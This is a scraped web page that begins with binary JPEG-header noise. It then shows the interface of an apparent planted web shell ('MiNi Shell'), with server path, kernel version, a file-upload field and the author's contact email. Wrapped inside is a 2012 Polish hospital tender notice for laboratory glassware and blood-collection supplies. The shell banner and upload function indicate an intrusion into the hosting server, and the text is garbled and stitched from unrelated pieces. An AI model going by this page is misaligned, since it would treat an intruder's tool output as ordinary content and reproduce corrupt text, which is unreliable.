JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/141885-N-2012.html

<p class="kh_header"><b>Opole Lubelskie: Laboratoryjne wyroby szklane</b><br>
<b>Numer ogłoszenia: 141885 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Laboratoryjne wyroby szklane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzedaż wraz z dostawą laboratoryjnych wyrobów szklanych dla potrzeb Laboratorium Szpitala Powiatowego w Opolu Lubelskim, Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Opolu Lub.  ul. Przemysłowa 4a.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozopolelubelskie.pl/index.php?option=com_docman&task=cat_view&gid=210&Itemid=115<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2012 godzina 14:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej, 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zadanie nr   1     Pipety automatyczne	j.m.	ilość
1	stałopojemnościowe pipety automatyczne o poj. 50 ml 	szt.	8
2	stałopojemnościowe pipety automatyczne i poj. 500 ml 	szt.	8
3	stałopojemnościowe pipety automatyczne o poj. 1000 ml 	szt.	8
4	pipeta automatyczna o zmiennej pojemności 10-100 ml	szt.	8
5	pipeta automatyczna o zmiennej pojemności 100-1000 ml 	szt.	10
6	pipeta automatyczna o zmiennej pojemności 1000-5000 ml	szt.	12
7	pipeta automatyczna o zmiennej pojemności 10-100 ml z wyrzutnikiem końcówek.	szt.	8
8	pipeta automatyczna o pojemności 50 ml z wyrzutnikiem	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr  2     - materiały laboratoryjne pomocnicze	j.m.	ilość
1	szczotki do mycia probówek o średnicy 15 mm o dł, 300mm z pędzelkiem myjącym	szt.	60
2	bagietka laboratoryjna z PP długość 125 mm, średnica 4 mm.	szt.	800
3	szpatułki laboratoryjne drewniane długość 114 mm, szerokość 9 mm	szt.	600
4	szczotki do probówek o średnicy 15-25 mm z miękkim końcem i drucianym trzonkiem o długości 310 mm.	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3  System zamkniętego, próżniowego pobierania krwi. UWAGA: system o parametrach granicznych określonych w załączniku NR 1	j.m.	ilość
1	Probówka do morfologii z tworzywa, na 2 ml , zawierająca K2 EDTA, o wym. 13x75 mm  /op. a. 100 szt./	op.	528
2	Probówki do biochemii z tworzywa na 9-10 ml, zawierająca aktywator krzepnięcia, o wym. 16x100 mm  /op. a. 100 szt./ 	op.	720
3	Probówka do glukozy z tworzywa , na 2 ml, zawierająca fluorek sodu, o wym. 13x75 mm  /op. a. 100 szt./	op.	408
4a	Probówka plastikowa lub szklana do oznaczania OB metodą liniową o poj. do 2 ml, zawierająca 3,8% cytrynian sodowy op. a. 100 szt.	op.	288
4b	Pipeta do oznaczania OB metodą liniową do probówek z pozycji 4a op. a. 200 szt	op.	144
4c	Statyw do oznaczania OB kompatybilny z probówką z poz. 4a	szt	8
5	Probówka do koaguologii z tworzywa, na 1,8 ml zawierająca 3,2% cytrynian sodu o wym. 13x75 mm /op. a. 100 szt./	op.	240
6	Probówka z tworzywa na 6 ml do serologii o wym. 13x100 mm z rozszerzoną etykietą do wpisywania danych pacjenta  /op. a. 100 szt./	op.	120
7	Probówka do osocza z EDTA K2, 4 ml o wym. 13x75 mm z rozszerzoną etykietą do wpisywania danych pacjenta  /op. a. 100 szt./	op.	24
8	Probówki na badania cito z trombiną 4-5 ml /op. a. 100 szt./	op	24
9	Igła systemowa z gwintem, z osłonką zabezpieczającą przed zakłuciem, zamknięcie igły bez konieczności użycia powierzchni twardych, rozm. igieł 0,7:0,8 /op. a. 100 szt/	op.	1100
10	Igła przeziernikowa z gwintem  0,8 /op. a. 50 szt./.	op.	200
11	Igła systemowa typu motylek, trwale połączona z zaworkiem, w sterylnym opakowaniu /dla niemowląt i pacj. o słabych żyłach, min. 2 rodzaje grubości/ op. a. 100 szt.	op.	24
12	Uchwyt do igieł systemowych, z gwintem / jeśli system tego wymaga/ /op. a. 250 szt./	op.	440
13	Nakłuwacz aktywowany przez kontakt, igłowy, głębokość nakłucia 1,5- 1,8 mm, do pobrania krwi z palca/pięty /op. a. 200 szt./	op.	144
14	Mikrometoda do morfologii z K2EDTA o pojemności 250-500 ml /op. a. 50 szt./	op.	64
15	Probówki do osocza z heparyną litową, poj. 4 ml, wym.13x75 mm  /op. a. 50 szt./	op.	48
16	Probówki do biochemii z aktywatorem wykrzepiania 13x75 mm, poj. 2 ml, op. a. 100 szt	op.	24
17	Mikroprobówka z kapilarą do morfologii z K2EDTA na 200 ml, op. a 100 szt.	op.	24
ZAŁĄCZNIK   NR 1

Parametry graniczne systemu:

L.p.
Parametry graniczne         Wartość oczekiwana                 wartość oferowana
1. System gwarantuje bezpośrednie pobranie krwi z jednego wkłucia do probówek i butelek na posiew krwi /bez dodatkowych elementów/.
                                              TAK

2. Wszystkie elementy systemu zamkniętego muszą być jednorazowego użytku.
                                              TAK

3. Zamknięcie probówek typu gumowy korek zabezpieczony plastikową osłoną, umożliwiające wielokrotne zamykanie i otwieranie probówek bez użycia dodatkowych elementów.
                                              TAK

4. Wszystkie elementy systemu zamkniętego służące bezpośrednio do pobierania krwi i probówki pochodzą od jednego producenta.
                                               TAK

5. Probówki z etykietami umożliwiającymi identyfikację próbki, datą ważności, serią oraz  /dotyczy także igieł i strzykawek/ oznakowaniem sterylności wg wymogów UE.
                                                TAK

6. Oferent zobowiązany jest dołączyć po 5 sztuk zaoferowanego asortymentu celem potwierdzenia spełnienia wymaganych parametrów.
                                               TAK

7. Certyfikat ISO 14001 odnośnie użytkowania i utylizacji - dołączyć kopię.
                                              TAK

8. Posiadanie kodu barwnego pozwalającego na identyfikację materiału przeznaczonego do badań zgodnego z ISO 6710.
                                                    TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr   4     Wyroby laboratoryjne szklane	j.m.	ilość
1	bagietki szklane 200mm	szt.	400
2	szkiełka nakrywkowe 22x22 mm	szt.	65000
3	szkiełka podstawowe gr.> 1 mm z ciętymi krawędziami gładkie	szt.	13000
4	Kapilary do pomiaru hematokrytu z heparyną o poj. 20 ml i dł. 75 mm.	szt.	2000
5	Kapilary do gazometrii 100 ml z heparyną Na	szt.	2000
6	zlewki szklane na 500 lub 600 ml	szt.	50
7	zlewki szklane  na 1000 ml	szt.	20
8	zlewki szklane na 250 lub 300 ml	szt.	30
9	kapilary szklane heparynowane typu end to end na 20 ml krwi	szt.	2000
10	Cylindry miarowe na 50 ml	szt.	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr  5    Wyroby laboratoryjne jednorazowe.	j.m.	ilość
1	probówki do serologii grup krwi z polistyrenu okrągłodenne o poj. 4 ml 12x75 mm	szt.	76000
2	Probówki typu Eppendorf o pojemności 1,5 ml z dnem stożkowym bezbarwne.	szt.	10000
3	Probówki z polistyrenu okrągłodenne 13x75	szt	52000
4	Probówki o poj. ok. 10 ml, wielkość  ok16x100 stożkowe, z optycznie przezroczystego PS, ze znacznikiem /poj. 1ml/	szt	44000
5	Korki standardowe do probówek o średnicy 12 mm białe. 	szt.	10000
6	naczynka do koagulometru Optic K -3002	szt.	16000
7	końcówki do pipet - żółte	szt.	40000
8	końcówki do pipet - niebieskie	szt.	80000
9	końcówki do pipet - bezbarwne na 5000 ml	szt.	2000
10	pipety Pasteura o dł. 155 mm poj. 3 ml	szt.	4500
11	jednorazowe płyty do oznaczania grup krwi (5 rzędów x 6 dołków), bezbarwne	szt.	2400
12	Sterylne probówki z polistyrenu o poj. 10-11 ml, wielkość 16x100 mm, okrągłodenne, z korkiem.	szt.	10000
13	ezy z zakończeniem prostym i oczkiem o poj.10 ml pakowane indywidualnie jałowe 	szt.	6000
14	pisaki do pisania na szkle typu Sharpie - op. x 10 szt. -czarne	op.	32
15	statywy z drutu stalowego powlekane warstwą tworzywa sztucznego na 20 probówek o średnicy 13-16 mm	szt.	60
16	Etykieta samoprzylepna 40x20 mm	szt	50000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com